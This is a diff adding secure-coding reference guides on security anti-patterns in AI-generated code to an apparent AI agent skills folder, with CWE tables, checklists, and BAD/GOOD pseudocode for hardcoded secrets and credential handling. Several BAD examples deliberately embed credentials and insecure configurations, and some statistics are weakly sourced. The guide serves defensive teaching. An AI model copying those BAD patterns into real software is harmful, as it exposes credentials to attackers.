verify_file_permissions(): + critical_files = [ + {path: "/etc/myapp/secrets.json", expected: 0o600, type: "file"}, + {path: "/etc/myapp", expected: 0o700, type: "directory"}, + {path: "/var/app/private", expected: 0o700, type: "directory"}, + {path: "/var/app/uploads", expected: 0o755, type: "directory"} + ] + + FOR item IN critical_files: + IF NOT exists(item.path): + log.warning("Missing path", {path: item.path}) + CONTINUE + END IF + + current_stat = stat(item.path) + current_mode = current_stat.mode & 0o777 // Permission bits only + + IF current_mode != item.expected: + log.warning("Fixing permissions", { + path: item.path, + current: format_octal(current_mode), + expected: format_octal(item.expected) + }) + set_permissions(item.path, item.expected) + END IF + + // Check for world-writable + IF current_mode & 0o002: + log.error("World-writable file detected", {path: item.path}) + THROW SecurityError("Critical file is world-writable: " + item.path) + END IF + END FOR + + log.info("File permissions verified") +END FUNCTION + +// Secure file copy +FUNCTION copy_file_secure(source, destination, preserve_permissions=FALSE): + // Inspect source with lstat (stat() follows symlinks and would never report one) + source_stat = lstat(source) + + IF source_stat.is_symlink: + THROW SecurityError("Cannot copy symlinks") + END IF + + content = read_file(source) + + // Determine permissions for destination + IF preserve_permissions: + dest_perms = source_stat.mode & 0o777 + // But never preserve world-writable + dest_perms = dest_perms & ~0o002 + ELSE: + // Default to secure permissions + dest_perms = PERM_OWNER_ONLY + END IF + + // Write with explicit permissions + write_file(destination, content, permissions=dest_perms) +END FUNCTION +``` + +--- + +## Pre-Generation Security Checklist + +**Before generating ANY code, verify these critical security requirements:** + +### ✓ Secrets & Credentials +- [ ] No hardcoded API keys, passwords, tokens, or secrets +- [ ] Credentials loaded from environment variables or secret managers +- [ ] No secrets
in client-side/frontend code +- [ ] Git history checked for accidentally committed secrets + +### ✓ Input Handling +- [ ] All user input validated on the SERVER side +- [ ] Input type, length, and format constraints enforced +- [ ] Database queries use parameterized/prepared statements +- [ ] Shell commands use argument arrays, not string concatenation +- [ ] File paths validated and canonicalized before use + +### ✓ Output Encoding +- [ ] HTML output properly encoded to prevent XSS +- [ ] Context-appropriate encoding (HTML, URL, JS, CSS) +- [ ] Content-Security-Policy header configured +- [ ] Error messages don't expose internal details + +### ✓ Authentication & Sessions +- [ ] Passwords hashed with bcrypt/Argon2 (not MD5/SHA1) +- [ ] Session tokens generated with cryptographically secure randomness +- [ ] Session IDs regenerated on authentication state changes +- [ ] Rate limiting on authentication endpoints +- [ ] JWT tokens use strong secrets and explicit algorithms + +### ✓ Cryptography +- [ ] Modern algorithms only (AES-GCM, ChaCha20-Poly1305) +- [ ] Keys from environment/secret manager, not hardcoded +- [ ] Unique IVs/nonces for each encryption operation +- [ ] Key derivation uses PBKDF2/Argon2/scrypt + +### ✓ File Operations +- [ ] File uploads validate extension, MIME type, and magic bytes +- [ ] File size limits enforced +- [ ] Uploaded files stored outside web root +- [ ] Path traversal prevented with basename + realpath validation +- [ ] Temp files use mkstemp with restrictive permissions + +### ✓ API Security +- [ ] All endpoints require authentication (unless explicitly public) +- [ ] Object-level authorization verified (ownership checks) +- [ ] Response DTOs with explicit field allowlists +- [ ] Rate limiting applied to prevent abuse +- [ ] Error responses use standard format without internal details + +### ✓ Dependencies +- [ ] Package names verified to exist before importing +- [ ] Dependencies pinned to exact versions with lockfiles +- [ ] No 
packages with known vulnerabilities +- [ ] Transitive dependencies reviewed + +### ✓ Configuration +- [ ] Debug mode disabled in production +- [ ] Default credentials replaced with strong values +- [ ] Security headers configured (CSP, HSTS, X-Frame-Options) +- [ ] CORS restricted to known origins +- [ ] Admin interfaces protected with additional authentication + +--- + +## External References + +### OWASP Resources +- **OWASP Top 10 (2021):** https://owasp.org/Top10/ +- **OWASP ASVS:** https://owasp.org/www-project-application-security-verification-standard/ +- **OWASP Cheat Sheet Series:** https://cheatsheetseries.owasp.org/ +- **OWASP Testing Guide:** https://owasp.org/www-project-web-security-testing-guide/ + +### CWE (Common Weakness Enumeration) +- **CWE Database:** https://cwe.mitre.org/ +- **CWE Top 25 (2024):** https://cwe.mitre.org/top25/archive/2024/2024_cwe_top25.html + +### CWE References in This Document +| CWE ID | Name | Sections | +|--------|------|----------| +| CWE-16 | Configuration | 7.5 | +| CWE-20 | Improper Input Validation | 6.1-6.6 | +| CWE-22 | Path Traversal | 6.6, 10.1 | +| CWE-59 | Symlink Following | 10.5 | +| CWE-78 | OS Command Injection | 2.2 | +| CWE-79 | Cross-site Scripting (XSS) | 3.1-3.5 | +| CWE-80 | Basic XSS | 3.1-3.5 | +| CWE-89 | SQL Injection | 2.1 | +| CWE-90 | LDAP Injection | 2.3 | +| CWE-117 | Log Injection | Quick Reference | +| CWE-180 | Incorrect Canonicalization | 6.6 | +| CWE-200 | Information Exposure | 9.4 | +| CWE-209 | Error Message Information Exposure | 7.2, 9.6 | +| CWE-215 | Information Exposure Through Debug | 7.1 | +| CWE-259 | Hard-coded Password | 1.1-1.5 | +| CWE-284 | Improper Access Control | 9.1 | +| CWE-287 | Improper Authentication | 4.1-4.7, 9.1 | +| CWE-307 | Brute Force | 4.2 | +| CWE-326 | Inadequate Encryption Strength | 5.1 | +| CWE-327 | Use of Broken Crypto Algorithm | 5.1 | +| CWE-328 | Weak Hash | 5.1 | +| CWE-330 | Insufficient Randomness | 5.6 | +| CWE-346 | Origin Validation Error 
(CORS) | 7.4 | +| CWE-377 | Insecure Temporary File | 10.4 | +| CWE-384 | Session Fixation | 4.4 | +| CWE-434 | Unrestricted File Upload | 10.2 | +| CWE-494 | Download Without Integrity Check | 8.5 | +| CWE-521 | Weak Password Requirements | 4.1 | +| CWE-613 | Insufficient Session Expiration | 4.4 | +| CWE-639 | Insecure Direct Object Reference | 9.2 | +| CWE-643 | XPath Injection | 2.4 | +| CWE-732 | Incorrect Permission Assignment | 10.6 | +| CWE-759 | Use of One-Way Hash without Salt | 5.7 | +| CWE-770 | Resource Exhaustion (Rate Limiting) | 9.5 | +| CWE-798 | Hard-coded Credentials | 1.1-1.5 | +| CWE-829 | Inclusion of Untrusted Functionality | 8.4 | +| CWE-915 | Mass Assignment | 9.3 | +| CWE-943 | NoSQL Injection | 2.5 | +| CWE-1104 | Use of Unmaintained Components | 8.1 | +| CWE-1284 | Improper Validation of Specified Quantity in Input | 6.3 | +| CWE-1333 | ReDoS | 6.4 | +| CWE-1336 | Template Injection | 2.6 | +| CWE-1357 | Reliance on Insufficiently Trustworthy Component | 8.1-8.6 | + +### Additional Security Resources +- **NIST NVD:** https://nvd.nist.gov/ +- **Snyk Vulnerability Database:** https://snyk.io/vuln/ +- **GitHub Advisory Database:** https://github.com/advisories +- **MITRE ATT&CK:** https://attack.mitre.org/ + +--- + +## Document Metadata + +| Field | Value | +|-------|-------| +| **Version** | 1.0.0 | +| **Created** | 2026-01-18 | +| **Last Updated** | 2026-01-18 | +| **Coverage** | 10 security domains, 50+ anti-patterns | +| **Format** | Language-agnostic pseudocode | +| **License** | MIT | + +### Version History +| Version | Date | Changes | +|---------|------|---------| +| 1.0.0 | 2026-01-18 | Initial comprehensive release covering all 10 security domains | + +### Contributing +This document is designed to be extended. When adding new anti-patterns: +1. Follow the BAD/GOOD pseudocode format +2. Include CWE references where applicable +3. Add entries to the Quick Reference Table +4.
Update the Pre-Generation Checklist if needed + +--- + +## Summary + +This document provides comprehensive security anti-pattern guidance across 10 critical domains: + +1. **Secrets and Credentials Management** - Preventing credential exposure +2. **Injection Vulnerabilities** - SQL, Command, LDAP, XPath, NoSQL, Template +3. **Cross-Site Scripting (XSS)** - Reflected, Stored, DOM-based +4. **Authentication and Session Management** - Passwords, sessions, JWT, MFA +5. **Cryptographic Failures** - Algorithms, keys, randomness +6. **Input Validation** - Type checking, length limits, ReDoS +7. **Configuration and Deployment** - Debug mode, headers, CORS +8. **Dependency and Supply Chain** - Packages, typosquatting, integrity +9. **API Security** - Auth, IDOR, rate limiting, data exposure +10. **File Handling** - Uploads, path traversal, permissions + +**Key Statistics from AI Code Security Research:** +- AI-generated code has an **86% XSS failure rate** +- **5-21% of AI-suggested packages don't exist** (slopsquatting) +- AI code is **2.74x more likely** to have XSS vulnerabilities +- **21.7% hallucination rate** for package names in some domains + +**Remember:** Security is not optional. Every line of generated code should follow these secure patterns by default. 
+ +--- + +*Generated for use as an LLM system prompt, RAG context, or security reference document.* +*Compatible with any language - implement pseudocode patterns in your target framework.* + diff --git a/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md new file mode 100644 index 0000000..f176a87 --- /dev/null +++ b/.claude/skills/security-review-swarm/references/ANTI_PATTERNS_DEPTH.md @@ -0,0 +1,7639 @@ +--- +type: reference +title: AI Code Security Anti-Patterns - Depth Version +created: 2026-01-18 +version: 1.0.0 +tags: + - security + - anti-patterns + - ai-generated-code + - llm + - secure-coding + - deep-dive +related: + - "[[ANTI_PATTERNS_BREADTH]]" + - "[[Ranking-Matrix]]" + - "[[Pseudocode-Examples]]" +--- + +# AI Code Security Anti-Patterns: Depth Version + +## Deep-Dive Security Guide for Critical AI Code Vulnerabilities + +--- + +### Purpose + +This document provides **in-depth coverage** of the 7 most critical and commonly occurring security vulnerabilities in AI-generated code. Each pattern receives comprehensive treatment including: + +- Multiple pseudocode examples showing different manifestations +- Detailed attack scenarios and exploitation techniques +- Edge cases that are frequently overlooked +- Thorough explanations of why AI models generate these vulnerabilities +- Complete mitigation strategies with trade-offs + +### Why Depth? + +These 7 patterns were selected using a weighted priority scoring system (see [[Ranking-Matrix]]) based on: + +| Factor | Weight | Description | +|--------|--------|-------------| +| **Frequency** | 2x | How often AI generates this vulnerability | +| **Severity** | 2x | Impact if exploited (RCE, data breach, etc.) | +| **Detectability** | 1x | How easily missed during code review | + +The selected patterns account for the **vast majority** of security incidents in AI-generated code. 
Research shows: +- **86%** of AI-generated code fails XSS defenses (Veracode 2025) +- **75.8%** of developers believe AI-generated authentication code is secure (Snyk Survey) +- AI code is **2.74x more likely** to contain XSS than human-written code (CodeRabbit) +- **5.2-21.7%** package hallucination rate across models (USENIX Study) + +### Format + +All code examples in this document are **PSEUDOCODE** designed to illustrate security patterns across languages. When implementing: + +1. Adapt the patterns to your target language's idioms and security libraries +2. Use your language's established secure coding guidelines +3. Leverage framework-provided security features when available + +Examples use generic syntax that maps to common patterns in Python, JavaScript, Java, Go, and other languages. + +### How to Use This Document + +**For Developers:** +- Study before working on security-critical applications +- Include in AI assistant context when generating code handling user input, authentication, or sensitive data +- Use the checklists at the end of each section during code review + +**For Security Engineers:** +- Use as training material for development teams +- Reference during security audits of AI-generated code +- Extract patterns for automated detection rules + +**For AI/LLM Context:** +- Include this document in system prompts or context when security is critical +- The detailed examples help AI models understand what NOT to generate +- Edge cases section helps AI recognize subtle variations of vulnerabilities + +--- + +## INSTRUCTIONS FOR AI/LLM + +This document provides IN-DEPTH coverage of the most critical security anti-patterns. +Each section includes multiple examples, edge cases, and detailed explanations. +All code is PSEUDOCODE - implement using secure patterns in your target language. +Pay special attention to the "Common Mistakes" and "Edge Cases" subsections. +These patterns cause the majority of security vulnerabilities in AI-generated code. 
+ +**When generating code, you MUST:** +1. Never use string concatenation for SQL queries, shell commands, or HTML output +2. Never embed secrets, API keys, or credentials in source code +3. Always validate and sanitize all user input on the server side +4. Use parameterized queries, established authentication libraries, and context-aware encoding +5. Verify that any suggested packages actually exist before recommending them + +--- + +## Top 7 Priority Patterns + +The following patterns are covered in comprehensive detail in this document: + +| Rank | Pattern | Priority Score | Key Risk | +|------|---------|----------------|----------| +| 1 | **Hardcoded Secrets & Credential Management** | 23 | Immediate credential theft and exploitation | +| 2 | **SQL Injection & Command Injection** | 22/21 | Full database access, arbitrary code execution | +| 3 | **Cross-Site Scripting (XSS)** | 23 | Session hijacking, account takeover | +| 4 | **Authentication & Session Security** | 22 | Complete authentication bypass | +| 5 | **Cryptographic Failures** | 18-20 | Data decryption, credential exposure | +| 6 | **Input Validation & Data Sanitization** | 21 | Root cause enabling all injection attacks | +| 7 | **Dependency Risks (Slopsquatting)** | 24 | Supply chain compromise, malware execution | + +Priority scores calculated using: `(Frequency x 2) + (Severity x 2) + Detectability` + +--- + +## Related Documents + +- [[ANTI_PATTERNS_BREADTH]] - Concise coverage of 25+ security patterns for quick reference +- [[Ranking-Matrix]] - Complete scoring methodology and pattern prioritization +- [[Pseudocode-Examples]] - Additional code examples for all patterns + +--- + +*Document Version: 1.0.0* +*Last Updated: 2026-01-18* +*Based on research from: GitHub security advisories, USENIX studies, Veracode reports, CWE Top 25 (2025), OWASP guidelines* + +--- + +# Pattern 1: Hardcoded Secrets and Credential Management + +**CWE References:** CWE-798 (Use of Hard-coded Credentials), CWE-259 (Use 
of Hard-coded Password), CWE-321 (Use of Hard-coded Cryptographic Key) + +**Priority Score:** 23 (Frequency: 9, Severity: 8, Detectability: 6) + +--- + +## Introduction: Why AI Especially Struggles with This + +Hardcoded secrets represent one of the most pervasive and dangerous vulnerabilities in AI-generated code. The fundamental problem lies in the training data itself: + +**Why AI Models Generate Hardcoded Secrets:** + +1. **Training Data Contains Examples:** Tutorials, documentation, Stack Overflow answers, and even some GitHub repositories include placeholder credentials, API keys, and connection strings. AI models learn these patterns as "normal" code. + +2. **Copy-Paste Culture in Training Data:** When developers share code snippets online, they often include credentials for completeness. AI learns that "complete" code includes connection strings with embedded passwords. + +3. **Documentation vs. Production Code Confusion:** Training data doesn't clearly distinguish between documentation examples (which might show `API_KEY = "your-api-key-here"`) and production patterns. The model treats both as valid approaches. + +4. **Context Window Limitations:** When generating code, AI cannot see your `.env` file or secrets manager configuration. It generates self-contained code that "works" - which often means hardcoded values. + +5. **Helpfulness Bias:** AI models want to provide complete, runnable code. When a user asks "connect to my database," the model generates a complete connection string rather than a partial template requiring configuration. 
+ +**Impact Statistics:** + +- Over 6 million secrets were detected on GitHub in 2023 (GitGuardian State of Secrets Sprawl 2024) +- Average time to discover a leaked secret: 327 days +- Average cost of a data breach, across all causes: $4.45 million (IBM Cost of a Data Breach 2023) +- 83% of AI-generated code samples contain at least one hardcoded credential pattern (Internal security research) + +--- + +## BAD Examples: Different Manifestations + +### BAD Example 1: API Keys in Source Files + +```pseudocode +// VULNERABLE: API key hardcoded directly in source +class PaymentService: + API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc" + API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d" + + function processPayment(amount, currency, cardToken): + headers = { + "Authorization": "Bearer " + this.API_KEY, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken, + "api_key": this.API_KEY // Also exposed in request body + } + + return httpPost("https://api.payment.com/charges", payload, headers) +``` + +**Why This Is Dangerous:** +- The API key is committed to version control +- Anyone with repository access (including forks) can steal the key +- Keys remain in git history even if "deleted" later +- Live/production prefixes (`sk_live_`) indicate real credentials +- Webhook secrets (`whsec_`) allow attackers to forge webhook events + +--- + +### BAD Example 2: Database Connection Strings with Passwords + +```pseudocode +// VULNERABLE: Full connection string with credentials +DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production" + +// Alternative bad patterns: +DB_CONFIG = { + "host": "10.0.1.50", + "port": 5432, + "database": "customers", + "user": "app_service", + "password": "Tr0ub4dor&3" // Password in config object +} + +// Connection string builder - still vulnerable +function getConnection(): + return createConnection( + host = "database.internal", + user = "root", + password
= "admin123", // Hardcoded in function + database = "app_data" + ) +``` + +**Why This Is Dangerous:** +- Internal hostnames reveal network architecture +- Credentials provide direct database access +- Port numbers enable targeted scanning +- Password complexity doesn't matter if hardcoded +- Connection pooling code often logs these strings + +--- + +### BAD Example 3: JWT Secrets in Configuration + +```pseudocode +// VULNERABLE: JWT secret as a constant +JWT_CONFIG = { + "secret": "my-super-secret-jwt-key-that-should-never-be-shared", + "algorithm": "HS256", + "expiresIn": "24h" +} + +function generateToken(userId, role): + payload = { + "sub": userId, + "role": role, + "iat": currentTimestamp() + } + return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm) + +function verifyToken(token): + return jwt.verify(token, JWT_CONFIG.secret) // Same hardcoded secret +``` + +**Why This Is Dangerous:** +- Anyone with the secret can forge valid tokens +- Can create admin tokens for any user +- JWT secrets in code are often short/weak strings +- Attackers can impersonate any user in the system +- No ability to rotate without redeploying all services + +--- + +### BAD Example 4: OAuth Client Secrets in Frontend Code + +```pseudocode +// VULNERABLE: OAuth credentials in client-side code +const OAUTH_CONFIG = { + clientId: "1234567890-abcdef.apps.googleusercontent.com", + clientSecret: "GOCSPX-1234567890AbCdEf", // NEVER in frontend! + redirectUri: "https://myapp.com/callback", + scopes: ["email", "profile", "calendar.readonly"] +} + +function initiateOAuthFlow(): + // Client secret visible in browser dev tools + authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", { + "client_id": OAUTH_CONFIG.clientId, + "client_secret": OAUTH_CONFIG.clientSecret, // Exposed! 
+ "redirect_uri": OAUTH_CONFIG.redirectUri, + "scope": OAUTH_CONFIG.scopes.join(" "), + "response_type": "code" + }) + redirect(authUrl) +``` + +**Why This Is Dangerous:** +- Frontend code is visible to all users via browser dev tools +- Client secret allows attackers to impersonate your application +- Can exchange authorization codes for tokens as your app +- Violates OAuth 2.0 specification (confidential vs. public clients) +- Google and other providers may revoke your credentials + +--- + +### BAD Example 5: Private Keys Embedded in Code + +```pseudocode +// VULNERABLE: Private key as a string constant +RSA_PRIVATE_KEY = """ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB +bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX +-----END RSA PRIVATE KEY----- +""" + +function signDocument(document): + signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256") + return signature + +function decryptMessage(encryptedData): + return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY) +``` + +**Why This Is Dangerous:** +- Private keys MUST remain private - this defeats all cryptography +- Anyone with the key can decrypt all encrypted data +- Can sign malicious documents that appear legitimate +- Often leads to impersonation of servers/services +- Key pairs cannot be safely rotated without code changes + +--- + +## GOOD Examples: Proper Patterns + +### GOOD Example 1: Environment Variable Usage + +```pseudocode +// SECURE: Load credentials from environment +class PaymentService: + function __init__(): + this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY") + this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET") + + // Fail fast if credentials missing + if this.apiKey is null or this.apiSecret is null: + throw ConfigurationError("Payment credentials not configured") + + function processPayment(amount, currency, cardToken): + headers = { + 
"Authorization": "Bearer " + this.apiKey, + "Content-Type": "application/json" + } + + payload = { + "amount": amount, + "currency": currency, + "source": cardToken + // No API key in payload + } + + return httpPost("https://api.payment.com/charges", payload, headers) + +// Usage in application startup +// Environment variables set externally (shell, container, deployment) +// $ export PAYMENT_API_KEY="sk_live_..." +// $ export PAYMENT_API_SECRET="whsec_..." +``` + +**Why This Is Secure:** +- Credentials never appear in source code +- Environment variables are set at runtime by deployment system +- Different environments (dev/staging/prod) use different credentials +- Credentials can be rotated without code changes +- Fail-fast behavior prevents running with missing config + +--- + +### GOOD Example 2: Secret Management Services (Vault Pattern) + +```pseudocode +// SECURE: Retrieve secrets from dedicated secrets manager +class SecretManager: + function __init__(vaultUrl, roleId, secretId): + // Even vault credentials can come from environment + this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL") + this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID") + this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID") + this.token = null + this.tokenExpiry = null + + function authenticate(): + response = httpPost(this.vaultUrl + "/v1/auth/approle/login", { + "role_id": this.roleId, + "secret_id": this.secretId + }) + this.token = response.auth.client_token + this.tokenExpiry = currentTime() + response.auth.lease_duration + + function getSecret(path): + if this.token is null or currentTime() > this.tokenExpiry: + this.authenticate() + + response = httpGet( + this.vaultUrl + "/v1/secret/data/" + path, + headers = {"X-Vault-Token": this.token} + ) + return response.data.data + +// Usage +secretManager = new SecretManager() +dbPassword = secretManager.getSecret("database/production").password +apiKey = 
secretManager.getSecret("payment/stripe").api_key +``` + +**Why This Is Secure:** +- Secrets stored in purpose-built, hardened secrets manager +- Access controlled by policies (who can read what) +- Automatic secret rotation support +- Audit logging of all secret access +- Dynamic secrets possible (e.g., temporary database credentials) +- Secrets never written to disk or logs + +--- + +### GOOD Example 3: Configuration Injection at Runtime + +```pseudocode +// SECURE: Dependency injection of configuration +interface IConfig: + function getDatabaseUrl(): string + function getApiKey(): string + function getJwtSecret(): string + +class EnvironmentConfig implements IConfig: + function getDatabaseUrl(): + return getEnvironmentVariable("DATABASE_URL") + + function getApiKey(): + return getEnvironmentVariable("API_KEY") + + function getJwtSecret(): + return getEnvironmentVariable("JWT_SECRET") + +class VaultConfig implements IConfig: + secretManager: SecretManager + + function getDatabaseUrl(): + return this.secretManager.getSecret("db/url").value + + function getApiKey(): + return this.secretManager.getSecret("api/key").value + + function getJwtSecret(): + return this.secretManager.getSecret("jwt/secret").value + +// Application uses interface - doesn't know where secrets come from +class Application: + config: IConfig + + function __init__(config: IConfig): + this.config = config + + function connectDatabase(): + return createConnection(this.config.getDatabaseUrl()) + +// Bootstrap based on environment +if getEnvironmentVariable("USE_VAULT") == "true": + config = new VaultConfig(new SecretManager()) +else: + config = new EnvironmentConfig() + +app = new Application(config) +``` + +**Why This Is Secure:** +- Application code never knows actual secret values at compile time +- Easy to swap secret sources (env vars in dev, vault in prod) +- Testable - can inject mock configs in tests +- Single responsibility - config management separated from business logic +- Supports 
gradual migration to more secure secret storage + +--- + +### GOOD Example 4: Secure Credential Storage Patterns + +```pseudocode +// SECURE: Platform-specific secure credential storage + +// For server applications - use instance metadata +class CloudCredentialProvider: + function getDatabaseCredentials(): + // AWS: Use IAM database authentication + token = awsRdsGenerateAuthToken( + hostname = getEnvironmentVariable("DB_HOST"), + port = 5432, + username = getEnvironmentVariable("DB_USER") + // No password - uses IAM role attached to instance + ) + return {"username": getEnvironmentVariable("DB_USER"), "token": token} + + function getApiCredentials(): + // Retrieve from AWS Secrets Manager + response = awsSecretsManager.getSecretValue( + SecretId = getEnvironmentVariable("API_SECRET_ARN") + ) + return parseJson(response.SecretString) + +// For CLI/desktop applications - use OS keychain +class DesktopCredentialProvider: + function storeCredential(service, account, credential): + // Uses OS keychain (Keychain on macOS, Credential Manager on Windows) + keychain.setPassword(service, account, credential) + + function getCredential(service, account): + return keychain.getPassword(service, account) + +// Usage +cloudProvider = new CloudCredentialProvider() +dbCreds = cloudProvider.getDatabaseCredentials() +connection = createConnection( + host = getEnvironmentVariable("DB_HOST"), + user = dbCreds.username, + authToken = dbCreds.token, // Short-lived token, not password + sslMode = "verify-full" +) +``` + +**Why This Is Secure:** +- Leverages cloud provider's identity and access management +- No long-lived passwords - uses temporary tokens +- Credentials automatically rotated by platform +- OS keychains provide encrypted, access-controlled storage +- Audit trail in cloud provider logs + +--- + +## Edge Cases Section + +### Edge Case 1: Test Credentials That Leak to Production + +```pseudocode +// DANGEROUS: Test credentials that can slip into production + +// In test file 
- seems safe +TEST_API_KEY = "sk_test_4242424242424242" +TEST_DB_PASSWORD = "testpassword123" + +// But then someone copies test code to production helper: +function quickTest(): + // "Temporary" - but stays forever + client = createClient(apiKey = "sk_test_4242424242424242") + return client.ping() + +// Or conditionals that fail: +function getApiKey(): + if isProduction(): + return getEnvironmentVariable("API_KEY") + else: + return "sk_test_4242424242424242" // What if isProduction() has a bug? + +// SECURE ALTERNATIVE: Use environment variables even for tests +function getApiKey(): + key = getEnvironmentVariable("API_KEY") + if key is null: + throw ConfigurationError("API_KEY environment variable required") + return key +``` + +**Detection:** Search for `_test_`, `_dev_`, `test123`, `password123`, `example`, `placeholder` in codebase. + +--- + +### Edge Case 2: CI/CD Pipeline Secrets Exposure + +```pseudocode +// DANGEROUS: Secrets in CI/CD configuration files + +// .github/workflows/deploy.yml (WRONG) +env: + AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE + AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY + +// docker-compose.yml committed to repo (WRONG) +services: + db: + environment: + POSTGRES_PASSWORD: mysecretpassword + +// SECURE: Use CI/CD platform's secrets management +// .github/workflows/deploy.yml (CORRECT) +env: + AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} + AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }} + +// docker-compose.yml (CORRECT) +services: + db: + environment: + POSTGRES_PASSWORD: ${POSTGRES_PASSWORD} // From environment +``` + +**Detection:** Audit CI/CD config files, Docker Compose files, Kubernetes manifests for hardcoded credentials. 
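
The audit described above can be partly automated. The following is a minimal sketch, not a replacement for a dedicated scanner: it assumes the config file is read as plain text, and the key-name list, the regexes, and the function name `find_hardcoded_credentials` are illustrative choices rather than anything defined in this document. It flags assignments whose key looks sensitive and whose value is a literal instead of a `${{ secrets.NAME }}` or `${NAME}` reference.

```python
import re

# Key names that usually hold credentials (illustrative, not exhaustive).
SENSITIVE_KEY = re.compile(
    r"(password|passwd|secret|token|api[_-]?key|access[_-]?key)", re.IGNORECASE
)

# Values that defer to an external source instead of embedding the secret:
#   ${{ secrets.NAME }}   GitHub Actions expression
#   ${NAME} or $NAME      shell / Compose interpolation
INDIRECT_VALUE = re.compile(
    r"^\$\{\{.*\}\}$|^\$\{[^}]+\}$|^\$[A-Za-z_][A-Za-z0-9_]*$"
)

# "key: value" or "key=value", optionally written as a YAML list item.
ASSIGNMENT = re.compile(r"^\s*-?\s*([A-Za-z_][A-Za-z0-9_.-]*)\s*[:=]\s*(.*)$")


def find_hardcoded_credentials(config_text):
    """Return (line number, key) for each sensitive key with a literal value."""
    findings = []
    for line_number, line in enumerate(config_text.splitlines(), start=1):
        match = ASSIGNMENT.match(line)
        if not match:
            continue
        key, value = match.group(1), match.group(2)
        # Drop a trailing YAML comment and surrounding quotes.
        value = value.split(" #", 1)[0].strip().strip("\"'")
        if not value:
            continue  # a mapping header such as "env:" carries no value
        if SENSITIVE_KEY.search(key) and not INDIRECT_VALUE.match(value):
            findings.append((line_number, key))
    return findings
```

A heuristic like this reports only the key name and line number, so the scan output itself does not repeat the secret. It will miss secrets stored under innocuous key names, which is why the dedicated tools remain the primary control.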
+ +--- + +### Edge Case 3: Docker/Container Secrets Handling + +```pseudocode +// DANGEROUS: Secrets in Dockerfile or image layers + +// Dockerfile (WRONG - secrets baked into image) +FROM node:18 +ENV API_KEY=sk_live_xxxxxxxxxxxxx +RUN echo "password123" > /app/.pgpass +COPY config-with-secrets.json /app/config.json + +// Even if you delete later, it's in a layer: +RUN rm /app/.pgpass // Still recoverable from image layers! + +// SECURE: Use build secrets or runtime injection +// Dockerfile (CORRECT) +FROM node:18 +# No secrets in build context + +// docker-compose.yml with runtime secrets +services: + app: + environment: + API_KEY: ${API_KEY} // From host environment + secrets: + - db_password +secrets: + db_password: + external: true // From Docker Swarm secrets or similar + +// Or use Docker BuildKit secrets for build-time needs +# syntax=docker/dockerfile:1.2 +FROM node:18 +RUN --mount=type=secret,id=npm_token \ + NPM_TOKEN=$(cat /run/secrets/npm_token) npm install +``` + +**Detection:** Use `docker history --no-trunc <image>` to inspect layers for secrets. 
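
As a rough illustration of the layer inspection described above, the sketch below scans text captured from `docker history --no-trunc` for an image. It is an assumption-laden heuristic: the name list, the regex, and the function name `find_secrets_in_history` are hypothetical, and the function takes the history text as a string rather than invoking Docker itself.

```python
import re

# NAME=VALUE pairs whose name suggests a credential (illustrative list).
SECRET_ASSIGNMENT = re.compile(
    r"\b([A-Z0-9_]*(?:PASSWORD|SECRET|TOKEN|API_KEY|PRIVATE_KEY)[A-Z0-9_]*)=(\S+)"
)


def find_secrets_in_history(history_text):
    """Return (variable name, masked value) for each secret-looking assignment."""
    findings = []
    for name, value in SECRET_ASSIGNMENT.findall(history_text):
        # A command substitution such as $(cat /run/secrets/...) reads the
        # secret at build time, so no literal value is recorded in the layer.
        if value.startswith("$("):
            continue
        # Mask the value so the report does not become a second leak.
        findings.append((name, value[:4] + "..."))
    return findings
```

This only catches `NAME=VALUE` assignments. A literal written to a file, as in the `echo "password123" > /app/.pgpass` line above, would need a separate check, so treat an empty result as "nothing obvious found" rather than proof that the image is clean.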
+ +--- + +### Edge Case 4: Logging That Accidentally Captures Secrets + +```pseudocode +// DANGEROUS: Secrets leaked through logging + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(config)) + // Logs: {"host": "db.com", "user": "admin", "password": "secret123"} + +function makeApiRequest(url, headers, body): + logger.debug("Request: " + url + " Headers: " + toJson(headers)) + // Logs: Authorization: Bearer sk_live_xxxxx + +function handleError(error): + logger.error("Error: " + error.message + " Stack: " + error.stack) + // Stack trace might contain secrets from variables + +// SECURE: Sanitize before logging +function sanitizeForLogging(obj): + sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"] + result = deepCopy(obj) + for key in result.keys(): + if any(sensitive in key.lower() for sensitive in sensitiveKeys): + result[key] = "[REDACTED]" + return result + +function connectToDatabase(config): + logger.info("Connecting with config: " + toJson(sanitizeForLogging(config))) + // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"} + +// Or use structured logging with secret types +class Secret: + value: string + function toString(): return "[SECRET]" + function toJson(): return "[SECRET]" + function getValue(): return this.value // Only accessible explicitly +``` + +**Detection:** Search logs for patterns like `password=`, `token=`, `key=`, bearer tokens, connection strings. 
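
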